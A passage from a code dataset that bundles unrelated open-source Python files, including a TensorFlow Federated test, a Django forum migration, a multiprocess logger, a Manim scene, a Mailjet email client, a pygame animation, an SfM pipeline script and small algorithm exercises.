tf.bool}, False)]\n )\n # pylint: enable=g-complex-comprehension\n # pyformat: enable\n def test_is_argspec_compatible_with_types(self, argspec, args, kwargs,\n expected_result):\n self.assertEqual(\n function_utils.is_argspec_compatible_with_types(\n argspec, *[computation_types.to_type(a) for a in args], **{\n k: computation_types.to_type(v)\n for k, v in six.iteritems(kwargs)\n }), expected_result)\n\n # pyformat: disable\n @parameterized.parameters(\n (tf.int32, False),\n ([tf.int32, tf.int32], True),\n ([tf.int32, ('b', tf.int32)], True),\n ([('a', tf.int32), ('b', tf.int32)], True),\n ([('a', tf.int32), tf.int32], False),\n (anonymous_tuple.AnonymousTuple([(None, 1), ('a', 2)]), True),\n (anonymous_tuple.AnonymousTuple([('a', 1), (None, 2)]), False))\n # pyformat: enable\n def test_is_argument_tuple(self, arg, expected_result):\n self.assertEqual(function_utils.is_argument_tuple(arg), expected_result)\n\n # pyformat: disable\n @parameterized.parameters(\n (anonymous_tuple.AnonymousTuple([(None, 1)]), [1], {}),\n (anonymous_tuple.AnonymousTuple([(None, 1), ('a', 2)]), [1], {'a': 2}))\n # pyformat: enable\n def test_unpack_args_from_anonymous_tuple(self, tuple_with_args,\n expected_args, expected_kwargs):\n self.assertEqual(\n function_utils.unpack_args_from_tuple(tuple_with_args),\n (expected_args, expected_kwargs))\n\n # pyformat: disable\n @parameterized.parameters(\n ([tf.int32], [tf.int32], {}),\n ([('a', tf.int32)], [], {'a': tf.int32}),\n ([tf.int32, tf.bool], [tf.int32, tf.bool], {}),\n ([tf.int32, ('b', tf.bool)], [tf.int32], {'b': tf.bool}),\n ([('a', tf.int32), ('b', tf.bool)], [], {'a': tf.int32, 'b': tf.bool}))\n # pyformat: enable\n def test_unpack_args_from_tuple_type(self, tuple_with_args, expected_args,\n expected_kwargs):\n args, kwargs = function_utils.unpack_args_from_tuple(tuple_with_args)\n self.assertEqual(len(args), len(expected_args))\n for idx, arg in enumerate(args):\n self.assertTrue(\n type_utils.are_equivalent_types(\n arg, computation_types.to_type(expected_args[idx])))\n self.assertEqual(set(kwargs.keys()), set(expected_kwargs.keys()))\n for k, v in six.iteritems(kwargs):\n self.assertTrue(\n type_utils.are_equivalent_types(\n computation_types.to_type(v), expected_kwargs[k]))\n\n def test_pack_args_into_anonymous_tuple_without_type_spec(self):\n self.assertEqual(\n function_utils.pack_args_into_anonymous_tuple([1], {'a': 10}),\n anonymous_tuple.AnonymousTuple([(None, 1), ('a', 10)]))\n self.assertIn(\n function_utils.pack_args_into_anonymous_tuple([1, 2], {\n 'a': 10,\n 'b': 20\n }), [\n anonymous_tuple.AnonymousTuple([\n (None, 1),\n (None, 2),\n ('a', 10),\n ('b', 20),\n ]),\n anonymous_tuple.AnonymousTuple([\n (None, 1),\n (None, 2),\n ('b', 20),\n ('a', 10),\n ])\n ])\n self.assertIn(\n function_utils.pack_args_into_anonymous_tuple([], {\n 'a': 10,\n 'b': 20\n }), [\n anonymous_tuple.AnonymousTuple([('a', 10), ('b', 20)]),\n anonymous_tuple.AnonymousTuple([('b', 20), ('a', 10)])\n ])\n self.assertEqual(\n function_utils.pack_args_into_anonymous_tuple([1], {}),\n anonymous_tuple.AnonymousTuple([(None, 1)]))\n\n # pyformat: disable\n @parameterized.parameters(\n ([1], {}, [tf.int32], [(None, 1)]),\n ([1, True], {}, [tf.int32, tf.bool], [(None, 1), (None, True)]),\n ([1, True], {}, [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]),\n ([1], {'y': True}, [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]),\n ([], {'x': 1, 'y': True}, [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]),\n ([], collections.OrderedDict([('y', True), ('x', 1)]),\n [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]))\n # pyformat: enable\n def test_pack_args_into_anonymous_tuple_with_type_spec_expect_success(\n self, args, kwargs, type_spec, elements):\n self.assertEqual(\n function_utils.pack_args_into_anonymous_tuple(\n args, kwargs, type_spec, NoopIngestContextForTest()),\n anonymous_tuple.AnonymousTuple(elements))\n\n # pyformat: disable\n @parameterized.parameters(\n ([1], {}, [(tf.bool)]),\n ([], {'x': 1, 'y': True}, [(tf.int32), (tf.bool)]))\n # pyformat: enable\n def test_pack_args_into_anonymous_tuple_with_type_spec_expect_failure(\n self, args, kwargs, type_spec):\n with self.assertRaises(TypeError):\n function_utils.pack_args_into_anonymous_tuple(args, kwargs, type_spec,\n NoopIngestContextForTest())\n\n # pyformat: disable\n @parameterized.parameters(\n (None, [], {}, 'None'),\n (tf.int32, [1], {}, '1'),\n ([tf.int32, tf.bool], [1, True], {}, '<1,True>'),\n ([('x', tf.int32), ('y', tf.bool)], [1, True], {}, '<x=1,y=True>'),\n ([('x', tf.int32), ('y', tf.bool)], [1], {'y': True}, '<x=1,y=True>'),\n ([tf.int32, tf.bool],\n [anonymous_tuple.AnonymousTuple([(None, 1), (None, True)])], {},\n '<1,True>'))\n # pyformat: enable\n def test_pack_args(self, parameter_type, args, kwargs, expected_value_string):\n self.assertEqual(\n str(\n function_utils.pack_args(parameter_type, args, kwargs,\n NoopIngestContextForTest())),\n expected_value_string)\n\n # pyformat: disable\n @parameterized.parameters(\n (1, lambda: 10, None, None, None, 10),\n (2, lambda x=1: x + 10, None, None, None, 11),\n (3, lambda x=1: x + 10, tf.int32, None, 20, 30),\n (4, lambda x, y: x + y, [tf.int32, tf.int32], None,\n anonymous_tuple.AnonymousTuple([('x', 5), ('y', 6)]), 11),\n (5, lambda *args: str(args), [tf.int32, tf.int32], True,\n anonymous_tuple.AnonymousTuple([(None, 5), (None, 6)]), '(5, 6)'),\n (6, lambda *args: str(args), [('x', tf.int32), ('y', tf.int32)], False,\n anonymous_tuple.AnonymousTuple([('x', 5), ('y', 6)]),\n '(AnonymousTuple([(x, 5), (y, 6)]),)'),\n (7, lambda x: str(x), # pylint: disable=unnecessary-lambda\n [tf.int32], None, anonymous_tuple.AnonymousTuple([(None, 10)]), '<10>'))\n # pyformat: enable\n def test_wrap_as_zero_or_one_arg_callable(self, unused_index, fn,\n parameter_type, unpack, arg,\n expected_result):\n wrapped_fn = function_utils.wrap_as_zero_or_one_arg_callable(\n fn, parameter_type, unpack)\n actual_result = wrapped_fn(arg) if parameter_type else wrapped_fn()\n self.assertEqual(actual_result, expected_result)\n\n def test_polymorphic_function(self):\n\n class ContextForTest(context_base.Context):\n\n def ingest(self, val, type_spec):\n return val\n\n def invoke(self, comp, arg):\n return 'name={},type={},arg={}'.format(\n comp.name, str(comp.type_signature.parameter), str(arg))\n\n class TestFunction(function_utils.ConcreteFunction):\n\n def __init__(self, name, parameter_type):\n self._name = name\n super(TestFunction, self).__init__(\n computation_types.FunctionType(parameter_type, tf.string),\n context_stack_impl.context_stack)\n\n @property\n def name(self):\n return self._name\n\n class TestFunctionFactory(object):\n\n def __init__(self):\n self._count = 0\n\n def __call__(self, parameter_type):\n self._count = self._count + 1\n return TestFunction(str(self._count), parameter_type)\n\n with context_stack_impl.context_stack.install(ContextForTest()):\n fn = function_utils.PolymorphicFunction(TestFunctionFactory())\n self.assertEqual(fn(10), 'name=1,type=<int32>,arg=<10>')\n self.assertEqual(\n fn(20, x=True), 'name=2,type=<int32,x=bool>,arg=<20,x=True>')\n self.assertEqual(fn(True), 'name=3,type=<bool>,arg=<True>')\n self.assertEqual(\n fn(30, x=40), 'name=4,type=<int32,x=int32>,arg=<30,x=40>')\n self.assertEqual(fn(50), 'name=1,type=<int32>,arg=<50>')\n self.assertEqual(\n fn(0, x=False), 'name=2,type=<int32,x=bool>,arg=<0,x=False>')\n self.assertEqual(fn(False), 'name=3,type=<bool>,arg=<False>')\n self.assertEqual(\n fn(60, x=70), 'name=4,type=<int32,x=int32>,arg=<60,x=70>')\n\n def test_concrete_function(self):\n\n class ContextForTest(context_base.Context):\n\n def ingest(self, val, type_spec):\n return val\n\n def invoke(self, comp, arg):\n return comp.invoke_fn(arg)\n\n class TestFunction(function_utils.ConcreteFunction):\n\n def __init__(self, type_signature, invoke_fn):\n super(TestFunction, self).__init__(type_signature,\n context_stack_impl.context_stack)\n self._invoke_fn = invoke_fn\n\n def invoke_fn(self, arg):\n return self._invoke_fn(arg)\n\n with context_stack_impl.context_stack.install(ContextForTest()):\n fn = TestFunction(\n computation_types.FunctionType(tf.int32, tf.bool), lambda x: x > 10)\n self.assertEqual(fn(5), False)\n self.assertEqual(fn(15), True)\n\n fn = TestFunction(\n computation_types.FunctionType([('x', tf.int32), ('y', tf.int32)],\n tf.bool), lambda arg: arg.x > arg.y)\n self.assertEqual(fn(5, 10), False)\n self.assertEqual(fn(10, 5), True)\n self.assertEqual(fn(y=10, x=5), False)\n self.assertEqual(fn(y=5, x=10), True)\n self.assertEqual(fn(10, y=5), True)\n\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"abogdanova/FedMed","sub_path":"federated-0.4.0/tensorflow_federated/python/core/impl/function_utils_test.py","file_name":"function_utils_test.py","file_ext":"py","file_size_in_byte":14948,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"24630668588","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport autoslug.fields\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('core', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('text', models.TextField(verbose_name='Answer')),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255, verbose_name='Title')),\n ('text', models.TextField(verbose_name='Question')),\n ('slug', autoslug.fields.AutoSlugField(editable=False, populate_from=b'title', unique=True, verbose_name='Slug')),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('hidden', models.BooleanField(default=False, verbose_name='Hidden')),\n ('hidden_justification', models.TextField(default=None, null=True, verbose_name='Justification', blank=True)),\n ('correct_answer', models.OneToOneField(related_name='+', null=True, blank=True, to='forum.Answer', verbose_name='Correct answer')),\n ('course', models.ForeignKey(verbose_name='Course', to='core.Course')),\n ('hidden_by', models.ForeignKey(related_name='hidden_questions', default=None, blank=True, to=settings.AUTH_USER_MODEL, null=True, verbose_name='User')),\n ('lesson', models.ForeignKey(related_name='forum_questions', verbose_name='Lesson', blank=True, to='core.Lesson', null=True)),\n ('user', models.ForeignKey(related_name='forum_questions', verbose_name='User', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField(auto_now=True)),\n ('value', models.IntegerField(default=0)),\n ],\n ),\n migrations.CreateModel(\n name='AnswerVote',\n fields=[\n ('vote_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='forum.Vote')),\n ],\n bases=('forum.vote',),\n ),\n migrations.CreateModel(\n name='QuestionVote',\n fields=[\n ('vote_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='forum.Vote')),\n ('question', models.ForeignKey(related_name='votes', verbose_name='Question', to='forum.Question')),\n ],\n bases=('forum.vote',),\n ),\n migrations.AddField(\n model_name='vote',\n name='user',\n field=models.ForeignKey(verbose_name='User', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(related_name='answers', verbose_name='Question', to='forum.Question'),\n ),\n migrations.AddField(\n model_name='answer',\n name='user',\n field=models.ForeignKey(related_name='forum_answers', verbose_name='User', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='answervote',\n name='answer',\n field=models.ForeignKey(related_name='votes', verbose_name='Answer', to='forum.Answer'),\n ),\n ]\n","repo_name":"hacklabr/timtec","sub_path":"forum/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"40"} +{"seq_id":"16603017108","text":"\"\"\"\nThis module handles logging across PILOT Drive and is multiprocess friendly.\n\"\"\"\n\nimport inspect\nimport logging\nimport os\nimport time\nfrom multiprocessing import Manager\nfrom typing import Callable\n\nfrom pilot_drive.constants import DEFAULT_LOG_SETTINGS, LOG_FILE_NAME, absolute_path\n\n\nclass MasterLogger:\n \"\"\"\n The class that handles the logger for the entire application, allowing for logging across\n multiple processes via the queue\n \"\"\"\n\n def __init__(self, log_settings: dict) -> None:\n \"\"\"\n Initialize the logger\n\n :param log_settings: a dict of logger settings, ie:\n {\"logLevel\": <0-50>, \"logToFile\": <bool>, \"logPath\": <LOG PATH>\"}.\n the :func: `~pilot_drive.services.Settings.get_raw_settings` can be used to supply this\n \"\"\"\n manager = Manager()\n self.__logging_queue = manager.Queue()\n self.__new_log = manager.Value(\"i\", 0)\n self.logger: logging.Logger = self.__initialize_logger(log_settings)\n\n def __initialize_logger(self, log_settings) -> logging.Logger:\n \"\"\"\n Initialized the logger and its configurations based on the log_settings dict\n\n :param log_settings: a dict of logger settings, ie:\n {\"logLevel\": <0-50>, \"logToFile\": <bool>, \"logPath\": <LOG PATH>\"}.\n the :func: `~pilot_drive.services.Settings.get_raw_settings` can be used to supply this\n :return: an instance of logging.Logger\n \"\"\"\n init_errors = (\n []\n ) # Append any errors to a list to be logged after logger initialization\n\n try:\n log_level = log_settings[\"logLevel\"]\n log_to_file = log_settings[\"logToFile\"]\n if log_to_file is True:\n log_path = log_settings[\"logPath\"]\n except KeyError as err:\n init_errors.append(\n \"Failed to retrieve logging value from settings: \" + str(err)\n )\n log_level = DEFAULT_LOG_SETTINGS[\"logLevel\"]\n log_to_file = DEFAULT_LOG_SETTINGS[\"logToFile\"]\n if log_to_file is True:\n log_path = log_settings[\"logPath\"]\n\n if log_to_file is True:\n # checks if the user specified the log path with file specified\n # (ie. /etc/pilot-drive/yeet.log) or just a directory path (ie. /etc/pilot-drive/)\n if log_path == \"\":\n log_path = DEFAULT_LOG_SETTINGS[\"logPath\"]\n\n if log_path[-1] == \"/\":\n log_path = f\"{log_path}{LOG_FILE_NAME}\"\n\n dir_path = log_path.split(\"/\")[:-1]\n dir_path = \"/\".join(dir_path)\n os.makedirs(name=dir_path, exist_ok=True)\n\n logging.basicConfig(\n filename=log_path,\n format=\"%(asctime)s:%(levelname)s:%(message)s\",\n datefmt=\"%m/%d/%Y-%H:%M:%S\",\n level=log_level,\n )\n\n # Disable the loggers of unintended services liek websocket & asyncio...\n logging.getLogger(\"asyncio\").setLevel(logging.ERROR)\n logging.getLogger(\"asyncio.coroutines\").setLevel(logging.ERROR)\n logging.getLogger(\"websockets.server\").setLevel(logging.ERROR)\n logging.getLogger(\"websockets.protocol\").setLevel(logging.ERROR)\n logger = logging.getLogger(__name__)\n return logger\n\n # Logic/APIs for services. Goal was to make it close to the feel of the logging module. Just\n # needs origin.\n\n def __add_to_queue(self, level: int, origin: str, msg: str) -> None:\n \"\"\"\n Add the logging event to the multiprocessing queue\n\n :param level: the logging level of the event ie. (0-50)\n :param origin: the origin of the logging event\n :param msg: the logging event\n \"\"\"\n log_dict = {\"level\": level, \"origin\": origin, \"message\": msg}\n self.__logging_queue.put(item=log_dict)\n self.__new_log.value = 1 # Indicate there is a new log value in the queue\n\n # pylint: disable=no-self-argument\n def __log_handler(self, level: int, msg: str) -> Callable:\n \"\"\"\n Handles the incoming logging event and adds it to the queue.\n\n :param level: the intended log level ie. (0-50)\n \"\"\"\n # Get the calling origin and format it to look like the typical logger call.\n origin = (\n inspect.stack()[2]\n .filename.replace(\"/main.py\", \"/__main__\")\n .replace(absolute_path, \"\")\n .replace(\"/\", \".\")\n .replace(\".py\", \"\")\n ) # Daisy chaining replace statements sucks. TODO: Use RegEx here.\n self.__add_to_queue(level=level, origin=origin, msg=msg)\n\n # Attempt to make the logging feel as close to the stock library as possible\n def critical(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'CRITICAL'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.CRITICAL, msg=msg)\n\n def error(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'ERROR'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.ERROR, msg=msg)\n\n def warning(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'WARNING'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.WARNING, msg=msg)\n\n def info(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'INFO'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.INFO, msg=msg)\n\n def debug(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'DEBUG'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.DEBUG, msg=msg)\n\n # Logic for actually logging.\n\n def __log(self, level: int, origin: str, message: str) -> None:\n \"\"\"\n Output the log with the :func:`~logging.Logger.log` method\n\n :param level: the logging level of the event ie. (0-50)\n :param origin: the origin of the logging event\n :param message: the logging event\n \"\"\"\n full_message = f\"{origin}: {message}\"\n self.logger.log(level=level, msg=full_message)\n\n def main(self) -> None:\n \"\"\"\n The main loop for the logger, reads from the queue and when theres is a new logging event,\n output it\n \"\"\"\n while True:\n if not self.__new_log.value == 0:\n self.__log(**self.__logging_queue.get())\n\n if self.__logging_queue.empty():\n self.__new_log.value = 0\n\n time.sleep(0.1)\n","repo_name":"lamemakes/pilot-drive","sub_path":"backend/pilot_drive/master_logging/master_logger.py","file_name":"master_logger.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"20632984182","text":"from pathlib import Path\n\nfrom manim import *\n\nclass Determinant(Scene):\n def construct(self):\n text_color = \"#333\"\n vect1_color = \"#b98b99\"\n vect2_color = \"#b9b28b\"\n\n numberplane = NumberPlane(\n background_line_style={\n \"stroke_opacity\": 0.4\n }\n )\n\n determinant = MathTex(\n \"\\\\det\\\\left( \\\\begin{bmatrix}a && b \\\\\\\\ c && d \\\\end{bmatrix}\\\\right) = ad - bc\", font_size=105\n ).set_color(text_color)\n determinant[0][5].set_color(vect1_color)\n determinant[0][6].set_color(vect2_color)\n\n determinant[0][7].set_color(vect1_color)\n determinant[0][8].set_color(vect2_color)\n\n determinant[0][12].set_color(vect1_color)\n determinant[0][13].set_color(vect2_color)\n\n determinant[0][15].set_color(vect2_color)\n determinant[0][16].set_color(vect1_color)\n\n determinant.move_to(ORIGIN + UP * 2.25)\n\n origin = np.array([-6, -3, 0])\n\n vect_1 = np.array([12, 0, 0])\n vect_2 = np.array([0, 3, 0])\n\n grid_1 = vect_1 + vect_2\n grid_2 = vect_2 + vect_1\n\n vect1 = Line(start=origin, end=origin + vect_1, stroke_color=vect1_color, stroke_width=10).add_tip()\n dashed_line1 = DashedLine(start=origin + vect_1, end=origin + grid_1, stroke_color=\"#ccc\", stroke_width=10)\n\n vect2 = Line(start=origin, end=origin + vect_2, stroke_color=vect2_color, stroke_width=10).add_tip()\n dashed_line2 = DashedLine(start=origin + vect_2, end=origin + grid_2, stroke_color=\"#ccc\", stroke_width=10)\n\n center_point = origin + ((vect_1 + vect_2) * 0.5)\n\n area_text = MathTex(\"ad - bc\", font_size=150).set_color(\"#333\").move_to(center_point)\n area_text[0][0].set_color(vect1_color)\n area_text[0][1].set_color(vect2_color)\n\n area_text[0][3].set_color(vect2_color)\n area_text[0][4].set_color(vect1_color)\n\n rectangle = Rectangle(width=vect_1[0], height=vect_2[1], color=\"#ccc\").move_to(center_point)\n\n self.add(numberplane, rectangle, determinant, vect1, vect2, dashed_line1, dashed_line2, area_text)\n\n\nif __name__ == '__main__':\n config.background_color = WHITE\n config.format = 'gif'\n config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/determinant')\n config.pixel_width = 400\n config.pixel_height = 225\n\n scene = Determinant()\n scene.render()\n\n","repo_name":"lextoumbourou/notes","sub_path":"code/manim/determinant_cover.py","file_name":"determinant_cover.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"15378088016","text":"import logging\nfrom http import HTTPStatus\nfrom typing import Any, Literal\n\nimport httpx\nfrom pydantic import BaseModel, Field, ConfigDict\n\nlogger = logging.getLogger(__name__)\n\nHttpMethod = Literal[\"GET\", \"OPTIONS\", \"HEAD\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]\n\n\nclass EmailUser(BaseModel):\n model_config = ConfigDict(populate_by_name=True)\n\n email: str = Field(alias=\"Email\")\n name: str | None = Field(alias=\"Name\")\n\n\nclass Attachment(BaseModel):\n model_config = ConfigDict(populate_by_name=True)\n\n content_type: str = Field(alias=\"ContentType\")\n filename: str = Field(alias=\"Filename\")\n base64_content: str = Field(alias=\"Base64Content\")\n content_id: str | None = Field(alias=\"ContentID\")\n\n\nclass Message(BaseModel):\n model_config = ConfigDict(populate_by_name=True)\n\n from_user: EmailUser = Field(alias=\"From\")\n to_users: list[EmailUser] = Field(alias=\"To\")\n subject: str = Field(alias=\"Subject\")\n text_part: str | None = Field(alias=\"TextPart\")\n html_part: str | None = Field(alias=\"HTMLPart\")\n attachments: list[Attachment] | None = Field(alias=\"Attachments\")\n inline_attachments: list[Attachment] | None = Field(alias=\"InlinedAttachments\")\n\n\nclass MailjetClient:\n base_url = \"https://api.mailjet.com/v3.1\"\n\n def __init__(self, auth: tuple[str, str], timeout: float = 5.0):\n self.auth = auth\n self.timeout = timeout\n\n async def send_email(\n self,\n from_user: EmailUser,\n to_users: list[EmailUser],\n subject: str,\n text_part: str | None = None,\n html_part: str | None = None,\n attachments: list[Attachment] | None = None,\n inline_attachments: list[Attachment] | None = None,\n ) -> bool:\n \"\"\"Send email. Return True if was sent, False otherwise.\n\n :raises TimeoutError when request to Mailjet timed out\n :raises MailjetAPIError when transport error occurred\n \"\"\"\n msg = Message(\n from_user=from_user,\n to_users=to_users,\n subject=subject,\n text_part=text_part,\n html_part=html_part,\n attachments=attachments,\n inline_attachments=inline_attachments,\n )\n payload = {\"Messages\": [msg.dict(exclude_none=True, by_alias=True)]}\n response = await self._call_api(\"POST\", f\"{self.base_url}/send\", json=payload)\n if response.status_code != HTTPStatus.OK:\n logger.error(\n \"Failed to send email. Mailjet returned %d status code. Response: %s\",\n response.status_code,\n response.text,\n )\n return False\n return response.json()\n\n async def _call_api(\n self, method: HttpMethod, url: str, json: dict[str, Any] | None = None\n ) -> httpx.Response | None:\n if not all(self.auth):\n return None\n async with httpx.AsyncClient() as client:\n try:\n response = await client.request(\n method,\n url,\n json=json,\n auth=self.auth,\n timeout=self.timeout,\n )\n return response\n except httpx.TimeoutException:\n raise TimeoutError from None\n except httpx.RequestError as exc:\n raise MailjetAPIError(exc) from None\n\n\nclass MailjetAPIError(Exception):\n ...\n","repo_name":"mirrorrim/service-example","sub_path":"app/seedwork/infrastructure/mailjet.py","file_name":"mailjet.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19882420383","text":"tot_cnt = 0\n\ndef dfs(nums,target,idx,cumSum):\n if idx == len(nums): # traversal이 끝난 경우\n if cumSum == target: # 타겟 넘버를 맞춘 경우\n global tot_cnt\n tot_cnt += 1 # 경우의 수 counting\n return\n else: # traversal 진행 중\n dfs(nums,target,idx+1,cumSum+nums[idx]) # ���음 원소, 누적값±(현재의 값)로 재귀\n dfs(nums,target,idx+1,cumSum-nums[idx])\n\ndef solution(numbers, target):\n dfs(numbers,target,0,0)\n return tot_cnt\n\n# 예상 출력: 5\n# Numbers = [1, 1, 1, 1, 1]\n# Target = 3\n\n# 예상 출력: 2\nNumbers = [4, 1, 2, 1]\nTarget = 4\n\nprint(solution(Numbers, Target))","repo_name":"claire-1125/AlgoStudy","sub_path":"Programmers/DFSnBFS/43165_TargetNumber_new.py","file_name":"43165_TargetNumber_new.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10027196500","text":"import sys\r\nl, r = list(map(str, sys.stdin.readline().strip().split(' ')))\r\neight = 0\r\n\r\nif (len(l) != len(r)):\r\n print(0)\r\nelse:\r\n for i in range(len(l)):\r\n if l[i] == '8' and r[i] == '8':\r\n eight += 1\r\n elif l[i] != r[i]:\r\n break\r\n print(eight)\r\n","repo_name":"wzrabbit/algorithm-practice","sub_path":"BOJ/♠ 1000~1999/1105_팔.py","file_name":"1105_팔.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"43185295828","text":"# Python Crash Course, Eric Matthes, no starch press\r\n# Ch8 Functions\r\n# Textbook Exercises\r\n\r\n# Louis Lozano\r\n# 3-16-2019\r\n# 8-4_large_shirts.py\r\n\r\n# Description: A function that takes two parameters and uses them\r\n# to display a shirts' size and message printed on it. Both parameters\r\n# have default values.\r\n\r\n# A function definition with default values for it's parameters.\r\ndef make_shirt(size='large', message='I love Python!'):\r\n print('Shirt size: ' + size.title())\r\n print('Shirt message: ' + message)\r\n\r\n# A function call using positional arguments.\r\nmake_shirt('medium')\r\n\r\n# A function call using keyword arguments.\r\nmake_shirt(message='Peace.')\r\n\r\n# A function call using only the default values.\r\nmake_shirt()\r\n\r\n","repo_name":"louloz/Python-Crash-Course","sub_path":"Ch8_Functions/8_4_large_shirts.py","file_name":"8_4_large_shirts.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21866924772","text":"import os\nimport sys\n\nimport pygame\nfrom pygame.locals import *\n\n\nclass Bird(pygame.sprite.Sprite):\n def __init__(self, position, scale=0.5):\n pygame.sprite.Sprite.__init__(self)\n\n paths = [f'./images/frame-{i + 1}.png' for i in range(8)]\n imgs = [pygame.image.load(p) for p in paths]\n rect = imgs[0].get_rect()\n\n w, h = rect.size[0], rect.size[1]\n w, h = int(w * scale), int(h * scale)\n\n self.imgs = [pygame.transform.scale(img, (w, h)) for img in imgs]\n self.rect = self.imgs[0].get_rect()\n self.rect.center = position[0] - w / 2.0, position[1] - h / 2.0\n self.index = 0\n\n def draw(self, surface):\n surface.blit(self.imgs[self.index], self.rect.center)\n self.index += 1\n if self.index >= len(self.imgs):\n self.index = 0\n\n\ndef start():\n pygame.init()\n\n FPS = 30\n width = 400\n height = 400\n DISPLAYSURF = pygame.display.set_mode((width, height))\n DISPLAYSURF.fill((255, 255, 255))\n pygame.display.set_caption('Key Events')\n fps_clock = pygame.time.Clock()\n\n bird = Bird((200, 200), 0.10)\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n DISPLAYSURF.fill((255, 255, 255, 0))\n\n bird.draw(DISPLAYSURF)\n\n pygame.display.update()\n fps_clock.tick(FPS)\n\n\nif __name__ == '__main__':\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n start()\n","repo_name":"oneoffcoder/lightning-projects","sub_path":"python/pygame/basic/char-animation.py","file_name":"char-animation.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"25280338559","text":"import sys\nimport logging\n\nfrom threedify_sfm.SfM import SfM\nfrom threedify_sfm.DataSet import DataSet\nfrom threedify_sfm.utils.opensfm import OpenSfM\nfrom threedify_sfm.constants import SFM_IMPLEMENTATION, BATCH_SIZE\nfrom threedify_sfm.utils.reconstructions import (\n fetch_reconstructions,\n reconstruction_failed,\n reconstruction_success,\n)\n\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef main():\n reconstructions = fetch_reconstructions(BATCH_SIZE)\n\n for reconstruction in reconstructions:\n try:\n logger.info(\n \"Running SfM for reconstruction: %s (%s)\",\n reconstruction.id,\n reconstruction.name,\n )\n\n logger.info(\"Creating dataset for reconstruction.\")\n dataset = DataSet(reconstruction)\n\n if SFM_IMPLEMENTATION == \"OPENSFM\":\n logger.info(\"Using OpenSfM implementation.\")\n sfm = OpenSfM(dataset)\n else:\n logger.info(\"Using ThreeDify SfM implementation.\")\n sfm = SfM(dataset)\n\n logger.info(\"Running SfM pipeline.\")\n file_path = sfm.run()\n\n reconstruction_success(reconstruction, file_path)\n except:\n err = sys.exc_info()[0]\n logger.error(\"Error occurred while running SfM pipeline: %s\", err)\n reconstruction_failed(reconstruction)\n continue\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ThreeDify/ThreeDify-SfM","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33115471967","text":"import openpyxl as pyxl\r\n\r\nfilename = input(\"Enter the filepath: \")\r\nwb = pyxl.load_workbook(filename)\r\n\r\nsheetName = input(\"Sheet name: \")\r\nsheet = wb[sheetName].values\r\n\r\nstart = int(input(\"Row with headers (this is assumed to be the start of data): \")) - 1\r\nheaders = []\r\n# for i, row in enumerate(sheet):\r\n# print(row)\r\n# if i == 